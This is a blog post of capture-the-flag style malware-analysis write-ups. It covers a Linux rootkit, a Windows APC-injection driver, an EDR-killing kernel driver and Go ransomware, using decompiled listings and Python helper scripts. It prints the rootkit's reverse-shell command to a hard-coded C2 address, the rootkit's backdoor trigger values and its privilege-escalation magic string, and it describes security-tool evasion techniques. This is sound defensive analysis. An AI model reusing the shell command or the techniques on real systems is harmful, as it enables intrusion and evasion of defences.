The publication date of this post reflects the initial version; I will probably split this up in the future.
The Malops platform is a collection of reverse engineering challenges targeting realistic malware scenarios. By providing a sample and a series of analysis questions, players are challenged to dive into real-world malware samples.
That’s exactly the right formula to get me hooked. To structure my progress while I make my way through the challenges and satisfy my inner completionist, I will be collecting write-ups below.
So far, the page below contains the following challenges (in order of completion):
This is a challenge in the rootkit category. We’re supplied with a file called singularity.ko, a Linux kernel module. The challenge suggests using IDA Pro, which means I’ll be using Binary Ninja.
“What is the SHA256 hash of the sample?”
We simply call sha256sum. The hash is 0b8ecdaccf492000f3143fa209481eb9db8c0a29da2b79ff5b7f6e84bb3ac7c8
“What is the name of the primary initialization function called when the module is loaded?”
Historically, the standard way was to implement init_module. More recent kernels define the module_init macro, which wraps a driver’s custom initialization function and defines it as an alias of init_module. The compiler appears to have flattened it back down to init_module.
“How many distinct feature-initialization functions are called within above mentioned function?”
The function looks as follows:
0x004052b0 int64_t init_module()
0x004052b0 endbr64
0x004052b4 call __fentry__
0x004052b9 push rbx {__saved_rbx}
0x004052ba call reset_tainted_init
0x004052bf mov ebx, eax
0x004052c1 call hiding_open_init
0x004052c6 or ebx, eax
0x004052c8 call become_root_init
0x004052cd or ebx, eax
0x004052cf call hiding_directory_init
0x004052d4 or ebx, eax
0x004052d6 call hiding_stat_init
0x004052db or ebx, eax
0x004052dd call hiding_tcp_init
0x004052e2 or ebx, eax
0x004052e4 call hooking_insmod_init
0x004052e9 or ebx, eax
0x004052eb call clear_taint_dmesg_init
0x004052f0 or ebx, eax
0x004052f2 call hooks_write_init
0x004052f7 or ebx, eax
0x004052f9 call hiding_chdir_init
0x004052fe or ebx, eax
0x00405300 call hiding_readlink_init
0x00405305 or ebx, eax
0x00405307 call bpf_hook_init
0x0040530c or ebx, eax
0x0040530e call hiding_icmp_init
0x00405313 or ebx, eax
0x00405315 call trace_pid_init
0x0040531a or ebx, eax
0x0040531c call module_hide_current
0x00405321 mov eax, ebx
0x00405323 pop rbx {__saved_rbx}
0x00405324 jmp __x86_return_thunk
We simply count the call operations, excluding the call to __fentry__; there are fifteen initialization functions.
“The reset_tainted_init function creates a kernel thread for anti-forensics. What is the hardcoded name of this thread?”
The reset_tainted_init function contains the following snippet:
0x004000aa void* rax_2 = kthread_create_on_node(
0x004000aa singularity_exit, 0, 0xffffffff,
0x004000aa "zer0t")
The last argument of kthread_create_on_node is the thread’s name, so the answer is zer0t
“The add_hidden_pid function has a hardcoded limit. What is the maximum number of PIDs the rootkit can hide?”
The following conditional in add_hidden_pid tells us when the loop breaks:
0x004027bc else if (hidden_count_1 != 0x20)
0x004027ca break
The limit is 0x20, which is 32 in decimal.
“What is the name of the function called last within init_module to hide the rootkit itself?”
Refer to the listing in question 3; it’s module_hide_current.
“The TCP port hiding module is initialized. What is the hardcoded port number it is configured to hide (decimal)?”
We look at functions related to TCP for this. hiding_tcp_init installs a number of hooks, one of which is hooked_tcp4_seq_show. The latter contains the following conditional. For clarity, we set the type of v to struct sock*.
0x00400d7b if (v->__offset(0x318).d
0x00400d7b != in_aton("192.168.5.128")
0x00400d7b && v->__sk_common..skc_addrpair.d
0x00400d7b != in_aton("192.168.5.128")
0x00400d7b && v->__offset(0x31e).w != 0xa146
0x00400d7b && v->__sk_common..skc_portpair.w
0x00400d7b != 0xa146)
The constant is 0xa146, but port numbers are stored in network byte order (big-endian), whereas the decompiler reads skc_portpair.w as a little-endian word. To compute the decimal value, we must therefore swap the bytes. We get 0x46a1, which is 18081.
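The byte swap is easy to double-check in Python. This is a minimal sketch; the helper name swap16 is my own and does not come from the sample.

```python
import struct

def swap16(value: int) -> int:
    """Reinterpret a 16-bit value that was read as little-endian as big-endian."""
    return struct.unpack(">H", struct.pack("<H", value))[0]

# 0xa146 is the constant exactly as the decompiler shows it.
port = swap16(0xA146)
print(hex(port), port)
```

The same helper works for any other 16-bit network field that shows up byte-swapped in a decompiled comparison.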
“What is the hardcoded “magic word” string, checked for by the privilege escalation module?”
The “privilege escalation module” appears to refer to become_root_init. This function installs a series of hooks starting from 0x0040aa10. Turning the data at that address into an array of ftrace_hook objects helps with readability somewhat.
We page through the installed hooks, and in hook_getuid we observe the following:
0x004002e2 if (strstr(i_1, "MAGIC=babyelephant") != 0)
0x004002e4 int64_t rax_5 = prepare_creds()
It appears the magic word is babyelephant.
“How many hooks, in total, does the become_root_init function install to enable privilege escalation?”
We see a singular call to fh_install_hooks. The second argument is the number of hooks: 0xa, or decimal 10.
“What is the hardcoded IPv4 address of the C2 server?”
See the snippet for question 7; 192.168.5.128. This IP also occurs in functions such as hooked_tpacket_rcv where the network traffic is hidden, and in hook_icmp_rcv and spawn_revshell where the actual connection is established.
“What is the hardcoded port number the C2 server listens on?”
The C2 server is waiting for the reverse shell that spawn_revshell launches; this function builds the following command string:
0x004048eb snprintf(&cmd, 0x300,
0x004048eb "bash -c 'PID=$$; kill -59 $PID; exec -a "%s" "
0x004048eb "/bin/bash &>/dev/tcp/%s/%s 0>&1' &",
0x004048eb "firefox-updater", "192.168.5.128", "443")
It establishes a TCP connection to 192.168.5.128 at port 443.
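To see the final command line, we can expand the format string ourselves. The sketch below only builds the string and never executes it; it assumes the three placeholders are filled in the order shown in the snprintf call, and build_command is a name I made up.

```python
# Format string as it appears in the decompiled snprintf call (C-style %s placeholders).
FMT = (
    "bash -c 'PID=$$; kill -59 $PID; exec -a \"%s\" "
    "/bin/bash &>/dev/tcp/%s/%s 0>&1' &"
)

def build_command(name: str, host: str, port: str) -> str:
    """Fill in the process name, C2 address and C2 port, in that order."""
    return FMT % (name, host, port)

cmd = build_command("firefox-updater", "192.168.5.128", "443")
print(cmd)
```

The /dev/tcp/host/port path is a bash feature that opens a TCP connection, and exec -a sets the name that the replacement bash process shows up under.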
“What network protocol is hooked to listen for the backdoor trigger?”
That’s what’s happening in hook_icmp_rcv; the protocol we’re looking for is ICMP.
“What is the “magic” sequence number that triggers the reverse shell (decimal)?”
I’ve not dissected the packet structure in detail, but the following comparison seems to give it away:
0x00404ae5 if (head != neg.q(rax_6) &&
0x00404ae5 in4_pton("192.168.5.128", 0xffffffff, &trigger_ip, 0xffffffff, 0) != 0
0x00404ae5 && *(rax_3 + 0xc) == trigger_ip && *rdx_3 == 8
0x00404ae5 && *(rdx_3 + 6) == 0xcf07)
The magic number is 0xcf07. As with the port in question 7, the field is in network byte order while the comparison reads it as a little-endian word, so we swap the bytes to get 0x07cf, which is 1999 in decimal.
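The offsets in that comparison line up with a standard ICMP echo header (type, code, checksum, identifier, sequence number), where the sequence number sits at offset 6. Assuming rdx_3 does point at the ICMP header, which I have not verified beyond the offsets matching, the two header checks can be mimicked as follows. The function name and the dummy identifier are mine.

```python
import struct

MAGIC_LE = 0xCF07  # constant from the comparison, as a little-endian word

def looks_like_trigger(icmp_header: bytes) -> bool:
    """Mimic the two header checks: type == 8 and the word at offset 6 == 0xcf07."""
    icmp_type = icmp_header[0]
    seq_le = struct.unpack_from("<H", icmp_header, 6)[0]
    return icmp_type == 8 and seq_le == MAGIC_LE

# Echo request (type 8) with sequence number 1999, packed in network byte order.
# Checksum and identifier are dummy values for illustration only.
header = struct.pack("!BBHHH", 8, 0, 0, 0x1234, 1999)
print(looks_like_trigger(header))
```

The source address check against 192.168.5.128 is left out here, since it operates on the IP header rather than the ICMP header.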
“When the trigger conditions are met, what is the name of the function queued to execute the reverse shell?”
Right below the condition from question 13, we find:
0x00404b3f if (rax_9 != 0)
0x00404b4f rax_9[3] = spawn_revshell
0x00404b5c int64_t rsi_2 = *system_wq
0x00404b63 *rax_9 = 0xfffffffe00000
0x00404b6a rax_9[1] = &rax_9[1]
0x00404b6e rax_9[2] = &rax_9[1]
0x00404b72 queue_work_on(0x2000, rsi_2)
The function is clearly named: spawn_revshell.
“The spawn_revshell function launches a process. What is the hardcoded process name it uses for the reverse shell?”
We refer to the command in question 11; the process name is supplied using the -a flag of the exec command: firefox-updater.
Continuing in the rootkit category, we’re given a single sample file. As we’ll see shortly, this is a Windows driver.
Binary Ninja correctly identifies this sample as something that runs on the windows-x86-kernel platform, but it appears support for this platform is not yet as complete as one might hope. In particular, the SEH prolog/epilog is not recognized correctly, and the type library is empty. We can manually select the windows-x86 platform instead, improving decompilation significantly. See also this GitHub issue.
“What is the SHA256 of this sample?”
Running sha256sum gives us 980954a2440122da5840b31af7e032e8a25b0ce43e071ceb023cca21cedb2c43
“What type of executable is this sample?”
This one had me stumped for a while. The answer format suggests we’re looking for six characters, so PE32 or PE is out. I tried native, but that was wrong.
After asking on the Malops Discord to verify whether the answer format was correct, I was told to look at the IMAGE_OPTIONAL_HEADER. Searching for a six-character word led me to the DllCharacteristics flags, one of which is WDM_DRIVER. This indicates that the file is a Windows driver that uses the Windows Driver Model.
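For those who prefer not to click through a GUI, the flag can also be read straight from the header. The following is a rough sketch based on the documented PE layout, in which DllCharacteristics sits at offset 70 of the optional header for both PE32 and PE32+; the function names are my own.

```python
import struct

IMAGE_DLLCHARACTERISTICS_WDM_DRIVER = 0x2000

def dll_characteristics(pe: bytes) -> int:
    """Return the DllCharacteristics field of a PE image held in memory."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("not a PE file")
    optional_header = e_lfanew + 4 + 20  # skip the signature and the COFF file header
    return struct.unpack_from("<H", pe, optional_header + 70)[0]

def is_wdm_driver(pe: bytes) -> bool:
    """Check whether the WDM_DRIVER bit is set."""
    return bool(dll_characteristics(pe) & IMAGE_DLLCHARACTERISTICS_WDM_DRIVER)
```

Calling is_wdm_driver on the raw bytes of the sample (read with open(path, "rb").read(), where path is wherever you stored the file) should report whether the flag is set.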
“This sample attempts to masquerade as a component of the system. Which system component is it attempting to masquerade as?”
The FileDescription field of the Version resource tells us that the file is the Windows NT SMB Manager. We can browse the file resources using tools such as Detect-It-Easy.
“What is the Original Filename of the sample?”
The OriginalFilename field is also part of a PE file’s Version resource. The original filename of this sample is mrxsmbmg.sys.
“This sample only runs on one type of system architecture, which one?”
This is a 32-bit driver and Windows provides no compatibility layer for drivers, so this sample only runs on 32-bit systems.
“This is targeted at specific versions of the Windows operating system. Which version of Windows will this sample not run on?”
In _start, we find the following snippet that retrieves and checks the system version:
0x00010d29 PsGetVersion(&var_8, &var_c, 0, 0)
0x00010d29 ...
0x00010d33 if (var_8 u<= 5)
The MajorVersion is written to var_8; the _start function only continues if it’s 5 or less. That’s remarkable, as the IMAGE_OPTIONAL_HEADER specifies a MajorOperatingSystemVersion requirement of 6.
“What Windows API does the sample use to execute the main function via Thread?”
Once the OS check has passed and a memory pool has been allocated, the _start function builds a thread context and calls PsCreateSystemThread at address 0x10dd7. Notably, it passes a pointer to sub_10afc as the StartRoutine argument.
“With the goal of obfuscating certain capabilities, the sample implements an algorithm for decrypting strings at runtime. What is the seed of this algorithm?”
In sub_10afc we find a couple references to sub_11524; the first argument is a constant, and the second is a reference to an address in the .data section. Looking at the chunks of data at those addresses, we identify several sequences of data separated by null bytes. Indeed, when we check the cross references to the start of these sequences, we find more references to sub_11524. Presumably this is the string deobfuscation routine.
Inside sub_11524, we find some buffer manipulation and a reference to sub_11432. This is where the magic happens:
0x00011456 if (result s> 0)
0x00011475 do
0x0001145e state = state * 0x19660d + 0x3c6ef35f
0x0001146e buffer[ecx_1] ^= (state u>> 0x10).w | 0x8000
0x00011472 ecx_1 += 1
0x00011475 while (ecx_1 s< result)
That’s an LCG! Tracing the function arguments, we see that the first argument of sub_11524 is passed to sub_11432 as its first argument as well. This is the LCG seed; 0xaa107fb.
Interestingly, there are two instances of data deobfuscation going on. The function described above operates on words, while the LCG at sub_11432 operates on bytes. Indeed, the encrypted strings from 0x12f20 onwards are separated by singular null bytes rather than null-words.
“What are the first three strings (in order) that were decrypted?”
Alas, a question where dynamic analysis is probably much more convenient. That requires firing up a Windows VM, though. We can use the Binary Ninja API and a bit of Python, instead:
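def decrypt_string(addr):
    # Meant for the Binary Ninja Python console, where bv is the current BinaryView.
    state = 0xAA107FB  # LCG seed
    output = ""
    while True:
        # Strings are stored as little-endian 16-bit words, terminated by a null word.
        data = int.from_bytes(bv.read(addr, 2), byteorder="little")
        addr += 2
        if data == 0:
            break
        # Advance the LCG and XOR the word with the upper half of the state.
        state = (state * 0x19660D + 0x3C6EF35F) & 0xFFFFFFFF
        output += chr(data ^ ((state >> 0x10) | 0x8000))
    return output

print(decrypt_string(0x12eb0))
print(decrypt_string(0x12e9c))
print(decrypt_string(0x12ecc))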
The fact that it operates on words tripped me up when implementing the above, and I ended up using unicorn with udbserver and gdbgui to trace what was going on. At that point the debugger showed the strings, but I was already too far down the static analysis rabbit hole to accept defeat.
We can use the Binary Ninja API as follows to quickly rename the strings accordingly; the first three strings are services.exe, lsass.exe and winlogon.exe.
bv.define_user_data_var(here, bv.get_data_var_at(here).type, decrypt_string(here))
Purely out of curiosity, the other strings in the .data section encrypted using the 2-byte LCG are msvcp73.dll and Kernel32.dll. The single-byte LCG was used to encrypt the names of memory allocation and thread related API calls: VirtualFree, LoadLibraryW, KeAttachProcess, KeDetachProcess, ZwAllocateVirtualMemory, ZwFreeVirtualMemory, KeInitializeApc, and KeInsertQueueApc.
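For anyone without Binary Ninja at hand, the word-based variant can also be sketched as standalone Python that works on raw bytes. This is my own reconstruction from the decompiled loop, not code lifted from the sample, and the round trip below uses a string I encrypt myself rather than bytes from the binary.

```python
SEED = 0xAA107FB

def keystream(seed: int = SEED):
    """Yield 16-bit keystream words from the LCG seen in sub_11432."""
    state = seed
    while True:
        state = (state * 0x19660D + 0x3C6EF35F) & 0xFFFFFFFF
        yield (state >> 16) | 0x8000

def xor_words(data: bytes, seed: int = SEED) -> bytes:
    """XOR little-endian 16-bit words with the keystream, stopping at a null word."""
    out = bytearray()
    ks = keystream(seed)
    for offset in range(0, len(data) - 1, 2):
        word = int.from_bytes(data[offset:offset + 2], "little")
        if word == 0:
            break
        out += (word ^ next(ks)).to_bytes(2, "little")
    return bytes(out)

plain = "services.exe".encode("utf-16-le")
encrypted = xor_words(plain)
decrypted = xor_words(encrypted + b"\x00\x00")
print(decrypted.decode("utf-16-le"))
```

Since XOR is its own inverse, the same function encrypts and decrypts. The | 0x8000 also has a neat side effect: for any character below 0x8000 the encrypted word has its top bit set, so it can never collide with the null terminator.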
“This sample implements a process injection routine. What is the name of the injection technique implemented by this sample?”
It should not come as a surprise that the decrypted process names we found in question 9 are targets for process injection.
The loop in sub_10afc iterates over the candidate processes. In sub_10a40 and sub_11fba, the ZwQuerySystemInformation API is used to retrieve SystemProcessInformation and iterate over all available processes to see whether the candidate process is present. When it is present, the actual injection is attempted in sub_1116e.
The strings we noted in question 9 are decrypted here:
0x000111b3 int32_t eax = sub_11582(0xaa107fb, &KeAttachProcess)
0x000111c1 int32_t eax_1 = sub_11582(0xaa107fb, &KeDetachProcess)
0x000111cf int32_t eax_2 = sub_11582(0xaa107fb, &ZwAllocateVirtualMemory)
0x000111dd int32_t eax_3 = sub_11582(0xaa107fb, &ZwFreeVirtualMemory)
Without diving into sub_11582, let’s assume it decrypts and resolves the listed API functions; the returned pointers are used directly in call instructions (e.g., at address 0x113e2). For clarity, we mark sub_113bd as an inline function so that Binary Ninja is able to follow the pointers that were stored on the stack.
After the calls to KeAttachProcess and ZwAllocateVirtualMemory, we see a call to ExAllocatePool that allocates a block of memory, which is then passed to sub_10fbc. Skipping ahead, we see that the buffer is then copied to the remotely allocated memory. Let’s jump into sub_10fbc!
In sub_10fbc, the first thing we notice is the decrypted strings Kernel32.dll, VirtualFree and LoadLibraryW. The Kernel32 string is passed to sub_10df0, where ZwQueryInformationProcess is called with ProcessInformationClass 0 (ProcessBasicInformation), which yields the address of the PEB. The remainder of the function walks the loader data in the PEB to find the entry for Kernel32.dll. Setting the variable assigned at address 0x10e8f to the PEB_LDR_DATA* type helps make the code a bit more readable. When Kernel32.dll is found, the respective LDR_DATA_TABLE_ENTRY is assigned to the output pointer in the second function argument:
0x00010ec9 while (true)
0x00010ed1 if (RtlCompareUnicodeString(&Flink->BaseDllName, &var_38, 1) == 0)
0x00010ed6 *arg2 = Flink
0x00010ede _local_unwind2(&ExceptionList, 0xffffffff)
0x00010ee5 result = 0
0x00010ee7 break
0x00010eec Flink = Flink->InLoadOrderLinks.Flink
Next up is sub_1174e. Binary Ninja does not quite recognize that it receives a bunch of arguments, and instead creates stack variables. It does now see that DllBase is passed, at least.
0x000110c0 RtlInitString(&var_3c, LoadLibraryW)
0x000110c5 int32_t var_34
0x000110c5 int32_t* var_4c_4 = &var_34
0x000110c6 int32_t var_50_7 = 0
0x000110ca void* var_54_2 = &var_3c
0x000110cb int32_t var_58_2 = 1
0x000110d5 result_2 = sub_1174e(DDL_base: result_4->DllBase)
By defining the function type to accept five arguments, we get the following:
0x000110c0 RtlInitString(dest: &var_3c, src: LoadLibraryW)
0x000110d5 int32_t var_34
0x000110d5 result_1 = sub_1174e(DDL_base: kernel32_1->DllBase, 1, &var_3c, 0, &var_34)
From context we can assume that it’s looking for VirtualFree and LoadLibraryW inside Kernel32.dll. When found, it writes the result to specific addresses within the buffer that was passed to sub_10fbc. But it appears we’re digressing a bit..
0x000110e8 memset(&pool[2], 0, 0x100)
0x000110f6 wcsncpy(&pool[2], arg2, 0xff)
0x00011102 *pool = virtualFree
0x00011107 pool[0x83] = loadLibraryW
After sub_10fbc has filled in the blanks and the code is set up, we jump into sub_11cca. I suppose this is where I should’ve immediately looked at where the other decrypted strings were used; at addresses 0x11cf2 and 0x11cff the API calls to KeInitializeApc and KeInsertQueueApc are resolved. This starts to look like APC injection...
Indeed, the remainder of the function uses KeInitializeApc to set up an APC context and KeInsertQueueApc to insert it into the queue. The third argument to sub_11cca is the target thread. Tracing the input we can see it was set up in sub_11b78, but I’ll leave that for another time.
“What are the two APIs used by this sample to execute the injection technique?”
We’ve covered this in the previous question: KeInitializeApc and KeInsertQueueApc.
“A shellcode will be injected using the technique identified in the previous question. This shellcode will load a module into the injected memory. What is the name of this module?”
We make note of another decrypted string: msvcp73.dll. We can find references to it in sub_104b4, where it’s decrypted and returned. We can then trace it as an argument to sub_1116e and into sub_10fbc, which we pulled apart for question 10. In particular, at address 0x110f6, the msvcp73.dll string is copied into the shellcode using wcsncpy.
It seems we get to stay in the kernel a bit longer. This challenge presents us with a kernel driver that sabotages EDR so that ransomware can do its thing. It is described to communicate over IOCTL. Reading this blogpost on communication between usermode and kernel drivers proved to be quite useful.
This time around we’re dealing with a 64-bit kernel driver, and the Binary Ninja platform windows-kernel-x86_64 is much more mature.
“The driver exposes itself to usermode applications under a specific name. What is this name?”
The only relevant outgoing function from DriverEntry (labeled _start) is sub_14000114c. We immediately note \Device\NSecKrnl and \DosDevice\NSecKrnl. Tracing these throughout the function, we see them being used as an input to IoCreateDevice and IoCreateSymbolicLink as the DeviceName and SymbolicLinkName.
The length of the answer format suggests that the answer we’re looking for is NSecKrnl.
“During initialization, the driver tampers with its own loader entry to bypass a kernel security check. What hex value is OR’d into that field?”
Right at the start of the function, we observe the following:
140001152 void* DriverSection = arg1->DriverSection
140001165 *(DriverSection + 0x68) |= 0x20
That must be what’s referred to here, so the answer is 0x20. The exact structure of the DriverSection is out of scope for this challenge.
“At what byte offset from the base of the loader data table entry does this tampering occur?”
That’s the offset we saw in Question 2: 0x68.
“One of the IOCTL codes handled by the dispatch function leads to forced process termination. What is this code in hex?”
Now we get to dive into the function that handles IOCTL codes; that’s MajorFunction 14, IRP_MJ_DEVICE_CONTROL, identified as sub_140001030.
By clicking through the subroutines of the dispatch function, we find sub_1400013e8 which includes a call to ZwTerminateProcess. This function is gated behind IOCTL code 0x2248e0.
“When the dispatch function receives an unrecognized IOCTL or a NULL input buffer, it returns a specific NTSTATUS code. What is it in hex?”
If none of the conditional branches are taken, the status is left at its default value of 0xc0000001 (STATUS_UNSUCCESSFUL).
“The driver maintains internal tracking arrays with a fixed capacity. How many entries can each array hold?”
An array is used in sub_140001614 in a loop that iterates until the index is 1024. In sub_140001240 we also see an array, and while the loop counter does not reveal its size, we note that the memory layout suggests it can also contain 1024 64-bit integers.
“The driver registers a kernel callback to intercept handle operations at a specific altitude. What is this altitude number?”
The altitude of a file system driver dictates where it is placed in the order of execution between the application layer and the file system.
All of this happens in sub_140001518, which is a bit of a mess straight out of decompilation. Proper struct typing is crucial; using the OB_CALLBACK_REGISTRATION type for the variable at stack offset -0x38 and OB_OPERATION_REGISTRATION for the variable at offset -0x58, we get the following:
140001533 OB_OPERATION_REGISTRATION op_reg
140001533 op_reg.ObjectType = PsProcessType
14000153e op_reg.Operations.q = 3
14000154f op_reg.PreOperation = sub_1400014b0
140001555 OB_CALLBACK_REGISTRATION callback_reg
140001555 callback_reg.Version = 0
140001555 callback_reg.OperationRegistrationCount = 0
140001555 callback_reg.Altitude.Length = 0
140001555 callback_reg.Altitude.MaximumLength = 0
140001559 callback_reg.OperationRegistration = 0
14000155d op_reg.PostOperation = 0
140001561 callback_reg.Altitude.Buffer = 0
140001561 callback_reg.RegistrationContext = 0
140001565 callback_reg.Version = 0x100
140001565 callback_reg.OperationRegistrationCount = 1
14000156c RtlInitUnicodeString(DestinationString: &callback_reg.Altitude, SourceString: u"328987")
140001576 callback_reg.RegistrationContext = 0
140001581 callback_reg.OperationRegistration = &op_reg
140001589 NTSTATUS result = ObRegisterCallbacks(CallbackRegistration: &callback_reg,
140001589 RegistrationHandle: &callback_registration_handle)
We could have suspected as much based on the string value, but now it is abundantly clear that the altitude is 328987.
“When the driver opens a handle to a process it is about to forcefully terminate, what handleattribute value (hex) does it request?”
This happens in the function we identified in question 4, sub_1400013e8. The value is 0x200, which corresponds to OBJ_KERNEL_HANDLE.
“What is the PDB filename embedded in the binary?”
This one’s for DiE. We find the path D:\NSecsoft\NSec\NSEC-Client-Kernel\Drivers\NSecKrnl\NSecKrnl\bin\NSecKrnl64.pdb
“The driver creates its device object with a specific device type constant. What is this value in hex?”
We find this as the DeviceType argument to IoCreateDevice; the value is 0x22 (FILE_DEVICE_UNKNOWN):
1400011d8 NTSTATUS result = IoCreateDevice(DriverObject: arg1, DeviceExtensionSize: 0,
1400011d8 DeviceName: &devicename, DeviceType: 0x22, DeviceCharacteristics: 0,
1400011d8 Exclusive: 0, &DeviceObject)
“All four IOCTL codes are evenly spaced. What is the stride (difference) between consecutive codes?”
The codes are 0x2248d4, 0x2248d8, 0x2248dc and 0x2248e0, so they’re 4 apart.
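The stride of 4 makes sense once we pull the codes apart. Windows IOCTL codes follow the CTL_CODE layout: device type in bits 16 to 31, required access in bits 14 and 15, function number in bits 2 to 13, and transfer method in the lowest two bits. A small sketch (decode_ioctl is a name I picked):

```python
def decode_ioctl(code: int) -> dict:
    """Split a Windows IOCTL code into its CTL_CODE components."""
    return {
        "device_type": (code >> 16) & 0xFFFF,
        "access": (code >> 14) & 0x3,
        "function": (code >> 2) & 0xFFF,
        "method": code & 0x3,
    }

for code in (0x2248D4, 0x2248D8, 0x2248DC, 0x2248E0):
    fields = decode_ioctl(code)
    print(hex(code), {name: hex(value) for name, value in fields.items()})
```

The four codes share device type 0x22 and method 0, and only differ in their function numbers, which are consecutive. Because the function number starts at bit 2, consecutive functions end up exactly 4 apart.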
“Before the handle interception callback checks its internal tables, it performs a self-check to avoid interfering when a process operates on itself. What kernel API provides the current process pointer for this comparison?”
This happens in the PreOperation callback we identified in question 7. It’s useful to type it accordingly (POB_PRE_OPERATION_CALLBACK), so that the arguments are resolved properly. We quickly see a call to IoGetCurrentProcess().
“After unregistering the handle interception callback during driver teardown, the registration handle global is set to a specific value. What is it?”
This happens in sub_140001674; the global is set to 0.
“The handle interception monitors two types of operations simultaneously. What is the combined flag value (decimal) in the operation registration structure?”
That’s the OB_OPERATION_REGISTRATION object, where we see an Operations value of 3. That’s the bitwise OR of OB_OPERATION_HANDLE_CREATE (1) and OB_OPERATION_HANDLE_DUPLICATE (2).
“The termination function must release a reference on the process object before returning. What kernel API performs this dereferencing?”
There is no room for ambiguity here: that’s ObfDereferenceObject.
“During initialization, the driver registers a notification callback for image loading events. The function registered for this purpose is unusually small. What is its size in bytes (hex)?”
The routine only contains a return instruction, c2 00 00, so it is 0x3 bytes long.
“The address of the function that the driver assigns as its DriverUnload handler is what?”
That’s sub_1400010e0.
This challenge concerns a ransomware sample written in Go. Binary Ninja seems to have some trouble; the support for Go’s calling conventions just isn’t quite there yet, and even with GoReSym output there’s still quite some work to do.
Luckily, IDA Free is able to handle this sample much better, so I’ll use IDA for this challenge. Note that I’ve generally left the function names the way IDA presents them, i.e., I did not replace the _ placeholders by Go’s / and . separators.
“Which version of the Go compiler was used to build this binary?”
DetectItEasy tells us it’s go1.24.5.
“What is the Relative Virtual Address (RVA) of the program’s main function?”
We find main_main at 0xDAE980.
“In the isRunningAsAdmin function, which Windows API is the first to be resolved via the HCWin/apihash package?”
We simply open up the function and see a call to HCWin_apihash__ptr_APIHash_GetCurrentProcess. Internally, this function calls the generic function HCWin_apihash__ptr_APIHash_CallAPI and passes GetCurrentProcess as a parameter.
“The binary calls GetTokenInformation. What specific token class (by name) is being requested to verify privileges?”
The call to GetTokenInformation also happens in isRunningAsAdmin; we find this by looking up cross-references to the GetTokenInformation function.
The function signature of GetTokenInformation is as follows:
BOOL GetTokenInformation(
[in] HANDLE TokenHandle,
[in] TOKEN_INFORMATION_CLASS TokenInformationClass,
[out, optional] LPVOID TokenInformation,
[in] DWORD TokenInformationLength,
[out] PDWORD ReturnLength
);
Looking at the second argument, we see that the constant value 20 is passed. If we set the type of that argument to TOKEN_INFORMATION_CLASS, IDA resolves it to TokenElevation.
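Without IDA’s type library, the constant can be resolved by hand. The enum below mirrors the first twenty members of TOKEN_INFORMATION_CLASS from the Windows headers; the Python class itself is just a lookup aid of my own making.

```python
from enum import IntEnum

class TokenInformationClass(IntEnum):
    """First twenty members of the Windows TOKEN_INFORMATION_CLASS enumeration."""
    TokenUser = 1
    TokenGroups = 2
    TokenPrivileges = 3
    TokenOwner = 4
    TokenPrimaryGroup = 5
    TokenDefaultDacl = 6
    TokenSource = 7
    TokenType = 8
    TokenImpersonationLevel = 9
    TokenStatistics = 10
    TokenRestrictedSids = 11
    TokenSessionId = 12
    TokenGroupsAndPrivileges = 13
    TokenSessionReference = 14
    TokenSandBoxInert = 15
    TokenAuditPolicy = 16
    TokenOrigin = 17
    TokenElevationType = 18
    TokenLinkedToken = 19
    TokenElevation = 20

# The constant passed as the second argument in isRunningAsAdmin.
print(TokenInformationClass(20).name)
```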
“Which package is responsible for configuring and executing the evasion of Event Tracing for Windows?”
Simply scrolling through main_main, we see several references to HCWin_etwevasion. Surely that must be it. A bit further down, we see alternative code paths that raise related error messages (“ETW evasion initialization failed”).
“If the malware fails to retrieve the computer name via the Windows API, which environment variable does it read as a fallback to generate the system seed?”
Looking for references to common Windows APIs to get the computer name, we identify internal_syscall_windows_GetComputerNameEx, which is called from Go’s os/hostname. That seems to be a dead end, though, as we find no references to os/hostname.
Instead we start top-down from main again. We do not immediately see any relevant calls directly from main_main, but the package does contain a getSystemSeed function. Upon closer inspection it is called indirectly via generateMutexName.
In getSystemSeed we see dynamic API resolution of GetComputerNameW, so we’re on the right track. In the alternative codepath, when syscall__ptr_LazyProc_Call(GetComputerNameW, ..) fails, we see a call to os_Getenv(USERNAME).
“The function getSystemSeed dynamically loads a DLL to access GetComputerNameW. What is the name of this DLL?”
Just above the call to LazyDLL/NewProc that loads GetComputerNameW, we see a call to syscall_NewLazyDLL("kernel32.dll", 12). That makes sense, as that’s where GetComputerNameW is typically found.
“The malware prepends a specific string to the generated Mutex name to ensure the synchronization object is visible across all user sessions. What is this prefix?”
We hop a function up in the call tree and look at generateMutexName. The function ends with a call to runtime_concatstring2, to which it passes a reference to data at address 0xE4CF36 and specifies a substring length of 7. If we look at the raw characters at this address, we find Global\.
“Which specific Windows error code does the checkSingleInstance function check to see if the Mutex already exists?”
IDA has some trouble following the stack variables in checkSingleInstance, but the comparison at 0xDADD65 is pretty clear: cmp rbx, 0B7h.
Looking at Windows system error codes, this corresponds to ERROR_ALREADY_EXISTS; “Cannot create a file when that file already exists.”
“The Hook Shield module starts a monitoring routine to check for hooks periodically. What is the time interval (in milliseconds) defined in this check?”
Looking through calls from main that relate to the Hook Shield module, we see HCWin_hookshield__ptr_HookDetector_StartMonitoring. In addition to the ‘detector’ object, it is passed the constant value 500000000. Clicking through the call stack we arrive at HCWin_hookshield__ptr_HookDetector_monitoringLoop, in which a new time/newTicker object is created. The Go documentation specifies that it takes a duration value in nanoseconds, so that’s 500 milliseconds.
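The unit conversion is trivial, but easy to get wrong by a factor of a thousand. A quick sanity check, assuming the constant is indeed a Go time.Duration (an integer number of nanoseconds):

```python
NANOSECONDS_PER_MILLISECOND = 1_000_000

def duration_to_ms(duration_ns: int) -> int:
    """Convert a nanosecond count to whole milliseconds."""
    return duration_ns // NANOSECONDS_PER_MILLISECOND

# Constant passed to StartMonitoring.
print(duration_to_ms(500_000_000))
```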
“To prevent victims from restoring files, the malware executes a specific function to remove Windows Volume Shadow Copies. What is the name of this function?”
Back in main, we see a call to HCWin_shadow_DeleteShadowCopies. Sometimes it is that straightforward.
“How many distinct services or processes is the malware configured to terminate (kill)?”
By searching for the keywords “terminate” and “kill”, we find a function called killBlacklistedServices. It starts with a loop that iterates over values found via the pointer at address 0x10606E0 (which points to 0x1066D00) to create main/killFlags objects. The iterator starts at the value found at 0x10606E8, where we see the value 0x1F (decimal 31). A pointer immediately followed by a count is consistent with a Go slice header. Indeed, there are 31 process names in the array at 0x1066D00.
“What is the memory address of the string data for the first service in the kill list?”
We find the reference at address 0x1066D00, pointing to 0xE4C09A where we find the string sql.
